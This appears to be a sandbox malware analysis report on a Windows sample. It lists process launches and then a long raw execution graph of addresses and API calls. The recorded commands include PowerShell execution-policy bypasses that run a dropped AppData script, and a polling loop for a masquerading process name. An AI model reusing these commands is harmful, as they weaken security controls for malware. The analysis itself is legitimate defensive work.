Wow64 process (32bit): true
Commandline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 13
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 14
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 16
Start time: 03:20:39
Start date: 27/12/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                                                                          Imagebase:0xd0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:03:20:39
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                                                                          Imagebase:0xd0000
                                                                          File size:433'152 bytes
                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:03:21:09
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:20
                                                                          Start time:03:21:09
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:21
                                                                          Start time:03:21:10
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 30 /nobreak
                                                                          Imagebase:0xa50000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:22
                                                                          Start time:03:21:40
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:23
                                                                          Start time:03:21:40
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:24
                                                                          Start time:03:21:40
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 30 /nobreak
                                                                          Imagebase:0x7ff6ec4b0000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:25
                                                                          Start time:03:22:10
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist /FI "IMAGENAME eq ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:26
                                                                          Start time:03:22:10
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "ShellExperienceHosts.exe"
                                                                          Imagebase:0x5b0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:27
                                                                          Start time:03:22:10
                                                                          Start date:27/12/2024
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:timeout /t 30 /nobreak
                                                                          Imagebase:0xa50000
                                                                          File size:25'088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false


                                                                            Execution Graph

                                                                            Execution Coverage:3.9%
                                                                            Dynamic/Decrypted Code Coverage:17.9%
                                                                            Signature Coverage:25.6%
                                                                            Total number of Nodes:2000
                                                                            Total number of Limit Nodes:70
                                                                            [Execution graph: the interactive node/edge rendering is not reproduced in this export. The raw graph data lists code addresses with the Windows API calls reached at each node; API names present in it include the networking calls socket, gethostbyname, connect, setsockopt and WSAIoctl, the anti-debugging check IsDebuggerPresent, the registry calls RegOpenKeyExW, RegDeleteValueW, RegSetValueExW and RegCloseKey, and the file and process calls CopyFileA, CreateProcessA, OpenProcess and CreateThread.]
calls std::ios_base::_Ios_base_dtor 127290->127339 127291->127163 127291->127285 127295 6c6bbbaa 127338 6c6bc394 72 API calls 127295->127338 127298 6c6c2108 127297->127298 127360 6c6c22ce 127298->127360 127302 6c6c2177 127302->127203 127304 6c6c4732 127303->127304 127305 6c6c22ce 44 API calls 127304->127305 127306 6c6c47c1 127305->127306 127307 6c6c239a 96 API calls 127306->127307 127308 6c6c47df 127307->127308 127308->127264 127309->127215 127311 6c6e113e ___std_exception_copy 127310->127311 127312 6c6e1158 127311->127312 127314 6c6e115a 127311->127314 127861 6c859b6b EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 127311->127861 127312->127215 127315 6c7a01c8 Concurrency::details::ExternalContextBase::~ExternalContextBase 127314->127315 127316 6c6e1164 Concurrency::cancel_current_task 127314->127316 127863 6c84c646 RaiseException 127315->127863 127862 6c84c646 RaiseException 127316->127862 127318 6c7a01e4 127320 6c79f61e 127321->127232 127322->127244 127323->127288 127324->127175 127325->127210 127326->127218 127327->127226 127328->127233 127329->127243 127330->127255 127331->127260 127332->127265 127333->127268 127334->127278 127335->127282 127336->127291 127337->127295 127338->127290 127339->127263 127340->127273 127341->127277 127864 6c85c476 29 API calls swprintf 127342->127864 127344 6c85c246 127865 6c85c254 11 API calls _unexpected 127344->127865 127346 6c85c253 127348 6c6b971e 127347->127348 127866 6c79f61f 30 API calls 2 library calls 127347->127866 127350 6c6b9727 127348->127350 127351 6c6b9746 127348->127351 127353 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127350->127353 127867 6c6b974b 30 API calls 2 library calls 127351->127867 127354 6c6b9730 127353->127354 127354->127169 127356 6c6bc099 127355->127356 127357 6c6bc0bf std::ios_base::_Ios_base_dtor 127355->127357 127356->127357 127358 6c85c237 29 API calls 127356->127358 127357->127207 127359 6c6bc0ea 
_strlen 127358->127359 127359->127207 127371 6c6c3d78 127360->127371 127363 6c6c239a 127364 6c6c23e5 127363->127364 127370 6c6c23d0 127363->127370 127408 6c79f4f1 127364->127408 127368 6c6c2404 127417 6c6c11ee 17 API calls 2 library calls 127368->127417 127370->127302 127372 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 127371->127372 127373 6c6c3dc3 127372->127373 127376 6c79f3d1 127373->127376 127375 6c6c2159 127375->127363 127377 6c79f3dd __EH_prolog3 127376->127377 127388 6c79ef60 127377->127388 127382 6c79f3fb 127402 6c79f464 41 API calls std::locale::_Setgloballocale 127382->127402 127383 6c79f456 Concurrency::details::ExternalContextBase::~ExternalContextBase 127383->127375 127385 6c79f403 127403 6c79f25b 14 API calls 3 library calls 127385->127403 127387 6c79f419 127394 6c79ef91 127387->127394 127389 6c79ef6f 127388->127389 127390 6c79ef76 127388->127390 127404 6c85c967 6 API calls std::_Lockit::_Lockit 127389->127404 127391 6c79ef74 127390->127391 127405 6c82e866 EnterCriticalSection 127390->127405 127391->127387 127401 6c79f2da 15 API calls 2 library calls 127391->127401 127395 6c85c975 127394->127395 127396 6c79ef9b 127394->127396 127407 6c85c950 LeaveCriticalSection 127395->127407 127400 6c79efae 127396->127400 127406 6c82e874 LeaveCriticalSection 127396->127406 127399 6c85c97c 127399->127383 127400->127383 127401->127382 127402->127385 127403->127387 127404->127391 127405->127391 127406->127400 127407->127399 127409 6c79f4fa 127408->127409 127411 6c6c23f3 127409->127411 127418 6c85b491 127409->127418 127411->127370 127416 6c6c0244 29 API calls 127411->127416 127414 6c79f569 127414->127411 127441 6c85ed83 127414->127441 127416->127368 127417->127370 127419 6c85b49c ___scrt_is_nonwritable_in_current_image 127418->127419 127420 6c85b4af 127419->127420 127423 6c85b4cf 127419->127423 127459 6c84f976 14 API calls ___free_lconv_mon 127420->127459 127422 6c85b4b4 127460 6c85c227 29 API calls 
___crtDownlevelLCIDToLocaleName 127422->127460 127425 6c85b4d4 127423->127425 127426 6c85b4e1 127423->127426 127461 6c84f976 14 API calls ___free_lconv_mon 127425->127461 127445 6c869e28 127426->127445 127428 6c79f54e 127428->127411 127437 6c85b134 127428->127437 127431 6c85b4f1 127462 6c84f976 14 API calls ___free_lconv_mon 127431->127462 127432 6c85b4fe 127453 6c86a1f2 127432->127453 127438 6c85b147 swprintf 127437->127438 127668 6c85b3e7 127438->127668 127440 6c85b15c swprintf 127440->127414 127442 6c85ed96 swprintf 127441->127442 127796 6c85ee41 127442->127796 127444 6c85eda2 swprintf 127444->127411 127446 6c869e34 ___scrt_is_nonwritable_in_current_image 127445->127446 127464 6c85c939 EnterCriticalSection 127446->127464 127448 6c869e42 127465 6c869ecc 127448->127465 127454 6c86a1fd 127453->127454 127502 6c85aee3 127454->127502 127458 6c85b513 127463 6c85b53c LeaveCriticalSection __fread_nolock 127458->127463 127459->127422 127460->127428 127461->127428 127462->127428 127463->127428 127464->127448 127474 6c869eef 127465->127474 127466 6c869e4f 127478 6c869e88 127466->127478 127467 6c869f47 127483 6c866b28 127467->127483 127474->127466 127474->127467 127481 6c84f83a EnterCriticalSection 127474->127481 127482 6c84f84e LeaveCriticalSection 127474->127482 127475 6c869f78 127497 6c84f83a EnterCriticalSection 127475->127497 127501 6c85c950 LeaveCriticalSection 127478->127501 127480 6c85b4ea 127480->127431 127480->127432 127481->127474 127482->127474 127488 6c866b35 __Getctype 127483->127488 127484 6c866b75 127499 6c84f976 14 API calls ___free_lconv_mon 127484->127499 127485 6c866b60 RtlAllocateHeap 127486 6c866b73 127485->127486 127485->127488 127490 6c8637d7 127486->127490 127488->127484 127488->127485 127498 6c859b6b EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 127488->127498 127491 6c8637e2 RtlFreeHeap 127490->127491 127492 6c86380c 127490->127492 127491->127492 127493 6c8637f7 GetLastError 127491->127493 
127492->127466 127496 6c865a87 6 API calls std::_Lockit::_Lockit 127492->127496 127494 6c863804 ___free_lconv_mon 127493->127494 127500 6c84f976 14 API calls ___free_lconv_mon 127494->127500 127496->127475 127497->127466 127498->127488 127499->127486 127500->127492 127501->127480 127503 6c85af02 127502->127503 127504 6c85af15 127503->127504 127512 6c85af2a 127503->127512 127522 6c84f976 14 API calls ___free_lconv_mon 127504->127522 127506 6c85af1a 127523 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127506->127523 127508 6c85af25 127508->127458 127519 6c8730b0 127508->127519 127510 6c85b0fb 127528 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127510->127528 127517 6c85b04a 127512->127517 127524 6c85d137 39 API calls 2 library calls 127512->127524 127514 6c85b09a 127514->127517 127525 6c85d137 39 API calls 2 library calls 127514->127525 127516 6c85b0b8 127516->127517 127526 6c85d137 39 API calls 2 library calls 127516->127526 127517->127508 127527 6c84f976 14 API calls ___free_lconv_mon 127517->127527 127529 6c873468 127519->127529 127522->127506 127523->127508 127524->127514 127525->127516 127526->127517 127527->127510 127528->127508 127532 6c873474 ___scrt_is_nonwritable_in_current_image 127529->127532 127530 6c87347b 127549 6c84f976 14 API calls ___free_lconv_mon 127530->127549 127532->127530 127534 6c8734a6 127532->127534 127533 6c873480 127550 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127533->127550 127540 6c8730d0 127534->127540 127539 6c8730cb 127539->127458 127552 6c8606e8 127540->127552 127545 6c873106 127547 6c873138 127545->127547 127548 6c8637d7 ___free_lconv_mon 14 API calls 127545->127548 127551 6c8734fd LeaveCriticalSection __wsopen_s 127547->127551 127548->127547 127549->127533 127550->127539 127551->127539 127600 6c84ee48 127552->127600 127556 6c86070c 127557 6c84ef42 127556->127557 127609 6c84efb7 127557->127609 127560 6c87313e 127626 6c8735d8 127560->127626 127601 6c84ee66 127600->127601 127602 6c84ee5f 127600->127602 
127601->127602 127603 6c863a63 __Getctype 39 API calls 127601->127603 127602->127556 127608 6c86583d 5 API calls std::_Lockit::_Lockit 127602->127608 127604 6c84ee87 127603->127604 127605 6c864072 __Getctype 39 API calls 127604->127605 127606 6c84ee9d 127605->127606 127607 6c86409f __wsopen_s 39 API calls 127606->127607 127607->127602 127608->127556 127610 6c84efc5 127609->127610 127611 6c84efdf 127609->127611 127612 6c84ef28 __wsopen_s 14 API calls 127610->127612 127613 6c84f005 127611->127613 127614 6c84efe6 127611->127614 127619 6c84ef5a 127612->127619 127615 6c86385f __wsopen_s MultiByteToWideChar 127613->127615 127616 6c84eee9 __wsopen_s 15 API calls 127614->127616 127614->127619 127617 6c84f014 127615->127617 127616->127619 127618 6c84f01b GetLastError 127617->127618 127621 6c84f041 127617->127621 127622 6c84eee9 __wsopen_s 15 API calls 127617->127622 127620 6c84f027 127618->127620 127619->127545 127619->127560 127624 6c84f976 ___free_lconv_mon 14 API calls 127620->127624 127621->127619 127623 6c86385f __wsopen_s MultiByteToWideChar 127621->127623 127622->127621 127625 6c84f058 127623->127625 127624->127619 127625->127618 127625->127619 127627 6c8735f9 127626->127627 127632 6c873613 127626->127632 127629 6c84f976 ___free_lconv_mon 14 API calls 127627->127629 127627->127632 127628 6c873568 __wsopen_s 29 API calls 127632->127628 127670 6c85b3f3 ___scrt_is_nonwritable_in_current_image 127668->127670 127669 6c85b3f9 127691 6c85c3d0 29 API calls 2 library calls 127669->127691 127670->127669 127672 6c85b43c 127670->127672 127679 6c84f83a EnterCriticalSection 127672->127679 127674 6c85b448 127680 6c85b2fb 127674->127680 127676 6c85b45e 127692 6c85b487 LeaveCriticalSection __fread_nolock 127676->127692 127678 6c85b414 127678->127440 127679->127674 127681 6c85b321 127680->127681 127682 6c85b30e 127680->127682 127693 6c85b222 127681->127693 127682->127676 127684 6c85b344 127687 6c85b35f 127684->127687 127690 6c85b3d2 127684->127690 127706 6c85fa9b 34 API calls 3 
library calls 127684->127706 127697 6c85ef99 127687->127697 127690->127676 127691->127678 127692->127678 127694 6c85b233 127693->127694 127696 6c85b28b 127693->127696 127694->127696 127707 6c869fce 31 API calls 2 library calls 127694->127707 127696->127684 127698 6c85b372 127697->127698 127699 6c85efb2 127697->127699 127703 6c86a00e 127698->127703 127699->127698 127708 6c85b10d 127699->127708 127701 6c85efce 127715 6c86c026 127701->127715 127778 6c86a16f 127703->127778 127705 6c86a027 127705->127690 127706->127687 127707->127696 127709 6c85b12e 127708->127709 127710 6c85b119 127708->127710 127709->127701 127726 6c84f976 14 API calls ___free_lconv_mon 127710->127726 127712 6c85b11e 127727 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127712->127727 127714 6c85b129 127714->127701 127717 6c86c032 ___scrt_is_nonwritable_in_current_image 127715->127717 127716 6c86c03a 127716->127698 127717->127716 127718 6c86c073 127717->127718 127720 6c86c0b9 127717->127720 127757 6c85c3d0 29 API calls 2 library calls 127718->127757 127728 6c85b941 EnterCriticalSection 127720->127728 127722 6c86c0bf 127723 6c86c0dd 127722->127723 127729 6c86be0a 127722->127729 127758 6c86c12f LeaveCriticalSection __wsopen_s 127723->127758 127726->127712 127727->127714 127728->127722 127730 6c86be32 127729->127730 127754 6c86be55 __fread_nolock 127729->127754 127731 6c86be36 127730->127731 127733 6c86be91 127730->127733 127773 6c85c3d0 29 API calls 2 library calls 127731->127773 127734 6c86beaf 127733->127734 127735 6c86a00e __wsopen_s 31 API calls 127733->127735 127759 6c86c137 127734->127759 127735->127734 127738 6c86bec7 127742 6c86bef6 127738->127742 127743 6c86becf 127738->127743 127739 6c86bf0e 127740 6c86bf77 WriteFile 127739->127740 127741 6c86bf22 127739->127741 127746 6c86bf99 GetLastError 127740->127746 127740->127754 127744 6c86bf63 127741->127744 127745 6c86bf2a 127741->127745 127775 6c86c1b4 45 API calls 3 library calls 127742->127775 127743->127754 127774 6c86c57b 6 API calls 
__wsopen_s 127743->127774 127746->127754 127754->127723 127757->127716 127758->127716 127760 6c870a7f __fread_nolock 29 API calls 127759->127760 127763 6c86c149 127760->127763 127761 6c86bec1 127761->127738 127761->127739 127762 6c86c177 127762->127761 127765 6c86c191 GetConsoleMode 127762->127765 127763->127761 127763->127762 127764 6c84fce0 __wsopen_s 39 API calls 127763->127764 127764->127762 127765->127761 127773->127754 127774->127754 127784 6c85b553 127778->127784 127780 6c86a181 127781 6c86a19d SetFilePointerEx 127780->127781 127783 6c86a189 __fread_nolock 127780->127783 127782 6c86a1b5 GetLastError 127781->127782 127781->127783 127782->127783 127783->127705 127785 6c85b575 127784->127785 127786 6c85b560 127784->127786 127788 6c85b59a 127785->127788 127794 6c84f976 14 API calls ___free_lconv_mon 127785->127794 127793 6c84f976 14 API calls ___free_lconv_mon 127786->127793 127788->127780 127789 6c85b56d 127789->127780 127791 6c85b5ad 127795 6c85c227 29 API calls ___crtDownlevelLCIDToLocaleName 127791->127795 127793->127789 127794->127791 127795->127789 127797 6c85ee4d ___scrt_is_nonwritable_in_current_image 127796->127797 127798 6c85ee57 127797->127798 127799 6c85ee7a 127797->127799 127822 6c85c3d0 29 API calls 2 library calls 127798->127822 127801 6c85ee72 127799->127801 127807 6c84f83a EnterCriticalSection 127799->127807 127801->127444 127803 6c85ee98 127808 6c85edb3 127803->127808 127805 6c85eea5 127823 6c85eed0 LeaveCriticalSection __fread_nolock 127805->127823 127807->127803 127809 6c85edc0 127808->127809 127810 6c85ede3 127808->127810 127835 6c85c3d0 29 API calls 2 library calls 127809->127835 127812 6c85ef99 ___scrt_uninitialize_crt 64 API calls 127810->127812 127820 6c85eddb 127810->127820 127813 6c85edfb 127812->127813 127824 6c86810c 127813->127824 127816 6c85b10d __fread_nolock 29 API calls 127817 6c85ee0f 127816->127817 127828 6c86bb80 127817->127828 127820->127805 127821 6c8637d7 ___free_lconv_mon 14 API calls 127821->127820 127822->127801 
127823->127801 127825 6c868123 127824->127825 127826 6c85ee03 127824->127826 127825->127826 127827 6c8637d7 ___free_lconv_mon 14 API calls 127825->127827 127826->127816 127827->127826 127831 6c85ee16 127828->127831 127832 6c86bba9 127828->127832 127829 6c86bbf8 127844 6c85c3d0 29 API calls 2 library calls 127829->127844 127831->127820 127831->127821 127832->127829 127833 6c86bbd0 127832->127833 127836 6c86bc23 127833->127836 127835->127820 127837 6c86bc2f ___scrt_is_nonwritable_in_current_image 127836->127837 127845 6c85b941 EnterCriticalSection 127837->127845 127839 6c86bc3d 127840 6c86bc6e 127839->127840 127846 6c86bae0 127839->127846 127859 6c86bca8 LeaveCriticalSection __wsopen_s 127840->127859 127843 6c86bc91 127843->127831 127844->127831 127845->127839 127847 6c85b553 __fread_nolock 29 API calls 127846->127847 127848 6c86baf0 127847->127848 127859->127843 127861->127311 127862->127320 127863->127318 127864->127344 127865->127346 127867->127351 127868 2230032 127878 2230ae4 GetPEB 127868->127878 127871 2230ae4 GetPEB 127874 22302a7 127871->127874 127872 22304a6 GetNativeSystemInfo 127873 22304d3 VirtualAlloc 127872->127873 127876 2230a02 127872->127876 127875 22304ec 127873->127875 127874->127872 127874->127876 127880 10007813 127875->127880 127879 223029b 127878->127879 127879->127871 127881 10007823 127880->127881 127882 1000781e 127880->127882 127886 1000771d 127881->127886 127894 1000b54b GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 127882->127894 127885 10007831 127885->127876 127887 10007729 _doexit 127886->127887 127891 10007776 127887->127891 127892 100077c6 _doexit 127887->127892 127895 100075b9 127887->127895 127889 100077a6 127890 100075b9 __CRT_INIT@12 149 API calls 127889->127890 127889->127892 127890->127892 127891->127889 127891->127892 127893 100075b9 __CRT_INIT@12 149 API calls 127891->127893 127892->127885 127893->127889 127894->127881 127896 100075c5 _doexit 127895->127896 127897 
10007647 127896->127897 127898 100075cd 127896->127898 127899 100076a8 127897->127899 127900 1000764d 127897->127900 127946 1000803b HeapCreate 127898->127946 127903 10007706 127899->127903 127904 100076ad 127899->127904 127906 1000766b 127900->127906 127912 100075d6 _doexit 127900->127912 127971 10008306 66 API calls _doexit 127900->127971 127902 100075d2 127902->127912 127965 10009ac6 86 API calls 4 library calls 127902->127965 127903->127912 127977 10009a58 79 API calls __freefls@4 127903->127977 127905 10009754 ___set_flsgetvalue 3 API calls 127904->127905 127908 100076b2 127905->127908 127911 1000767f 127906->127911 127972 1000b0e4 67 API calls _free 127906->127972 127913 10009fe4 __calloc_crt 66 API calls 127908->127913 127975 10007692 70 API calls __mtterm 127911->127975 127912->127891 127917 100076be 127913->127917 127914 100075e2 __RTC_Initialize 127923 100075f2 GetCommandLineA 127914->127923 127938 100075e6 127914->127938 127917->127912 127919 100076ca DecodePointer 127917->127919 127918 10007675 127973 100097a5 70 API calls _free 127918->127973 127925 100076df 127919->127925 127922 100075eb 127922->127912 127947 1000b468 71 API calls 2 library calls 127923->127947 127924 1000767a 127974 10008059 HeapDestroy 127924->127974 127928 100076e3 127925->127928 127929 100076fa 127925->127929 127932 100097e2 __CRT_INIT@12 66 API calls 127928->127932 127976 10006e49 66 API calls 2 library calls 127929->127976 127930 10007602 127948 1000ae9f 73 API calls __calloc_crt 127930->127948 127935 100076ea GetCurrentThreadId 127932->127935 127934 1000760c 127943 10007610 127934->127943 127968 1000b3ad 95 API calls 3 library calls 127934->127968 127935->127912 127966 10008059 HeapDestroy 127938->127966 127939 1000761c 127940 10007630 127939->127940 127949 1000b137 127939->127949 127940->127922 127970 1000b0e4 67 API calls _free 127940->127970 127967 100097a5 70 API calls _free 127943->127967 127946->127902 127947->127930 127948->127934 127950 1000b140 127949->127950 127953 
1000b145 _strlen 127949->127953 127978 1000de61 94 API calls __setmbcp 127950->127978 127952 10009fe4 __calloc_crt 66 API calls 127958 1000b17a _strlen 127952->127958 127953->127952 127956 10007625 127953->127956 127954 1000b1c9 127980 10006e49 66 API calls 2 library calls 127954->127980 127956->127940 127969 10008119 77 API calls 4 library calls 127956->127969 127957 10009fe4 __calloc_crt 66 API calls 127957->127958 127958->127954 127958->127956 127958->127957 127959 1000b1ef 127958->127959 127962 1000b206 127958->127962 127979 10007f48 66 API calls __cftoe_l 127958->127979 127981 10006e49 66 API calls 2 library calls 127959->127981 127982 100086b0 10 API calls __call_reportfault 127962->127982 127964 1000b212 127965->127914 127966->127922 127967->127938 127968->127939 127969->127940 127970->127943 127971->127906 127972->127918 127973->127924 127974->127911 127975->127912 127976->127912 127977->127912 127978->127953 127979->127958 127980->127956 127981->127956 127982->127964 127983 10006013 127984 10006045 127983->127984 127985 10020003 127984->127985 127988 1000608a 127984->127988 127991 10005e07 127984->127991 127989 100060a0 RegOpenKeyExW 127988->127989 127990 10003f35 127989->127990 127990->127990 127992 1001f0f9 RegQueryValueExW 127991->127992 127993 10003f35 127992->127993 127993->127993 127994 6c6e093a 127999 6c740f7c 127994->127999 127996 6c6e0944 127997 6c6e1262 32 API calls 127996->127997 127998 6c6e094e 127997->127998 128000 6c740f88 __EH_prolog3 127999->128000 128003 6c7412d8 128000->128003 128002 6c741171 Concurrency::details::ExternalContextBase::~ExternalContextBase 128002->127996 128004 6c7412f9 __fread_nolock 128003->128004 128013 6c741380 128003->128013 128007 6c741329 VerSetConditionMask VerSetConditionMask VerifyVersionInfoW GetSystemMetrics 128004->128007 128006 6c741393 128006->128002 128014 6c741395 128007->128014 128177 6c7a11c4 5 API calls ___raise_securityfailure 128013->128177 128178 6c7a11d2 128014->128178 128016 6c7413a1 GetSysColor 
128017 6c7413c2 GetSysColor 128016->128017 128018 6c7413b6 GetSysColor 128016->128018 128020 6c7413d9 GetSysColor 128017->128020 128021 6c7413e5 128017->128021 128018->128017 128020->128021 128179 6c6e2c90 128021->128179 128023 6c7413fb 22 API calls 128024 6c741525 128023->128024 128025 6c74152e GetSysColor 128023->128025 128026 6c741540 GetSysColorBrush 128024->128026 128025->128026 128027 6c74155c GetSysColorBrush 128026->128027 128028 6c7417ad 128026->128028 128027->128028 128029 6c74156f GetSysColorBrush 128027->128029 128219 6c75e7dc RaiseException CallUnexpected 128028->128219 128029->128028 128031 6c741582 128029->128031 128187 6c6e1e5c 128031->128187 128034 6c74158f CreateSolidBrush 128192 6c6e1e06 128034->128192 128037 6c6e1e5c 73 API calls 128038 6c7415ad CreateSolidBrush 128037->128038 128039 6c6e1e06 72 API calls 128038->128039 128040 6c7415be 128039->128040 128041 6c6e1e5c 73 API calls 128040->128041 128042 6c7415cb CreateSolidBrush 128041->128042 128043 6c6e1e06 72 API calls 128042->128043 128044 6c7415dc 128043->128044 128045 6c6e1e5c 73 API calls 128044->128045 128046 6c7415e9 CreateSolidBrush 128045->128046 128047 6c6e1e06 72 API calls 128046->128047 128048 6c7415fd 128047->128048 128049 6c6e1e5c 73 API calls 128048->128049 128050 6c74160a CreateSolidBrush 128049->128050 128051 6c6e1e06 72 API calls 128050->128051 128052 6c74161b 128051->128052 128053 6c6e1e5c 73 API calls 128052->128053 128054 6c741628 CreateSolidBrush 128053->128054 128055 6c6e1e06 72 API calls 128054->128055 128056 6c741639 128055->128056 128057 6c6e1e5c 73 API calls 128056->128057 128058 6c741646 CreateSolidBrush 128057->128058 128059 6c6e1e06 72 API calls 128058->128059 128060 6c741657 128059->128060 128061 6c6e1e5c 73 API calls 128060->128061 128062 6c741664 CreatePen 128061->128062 128063 6c6e1e06 72 API calls 128062->128063 128064 6c74167d 128063->128064 128065 6c6e1e5c 73 API calls 128064->128065 128066 6c74168a CreatePen 128065->128066 128067 6c6e1e06 72 API calls 
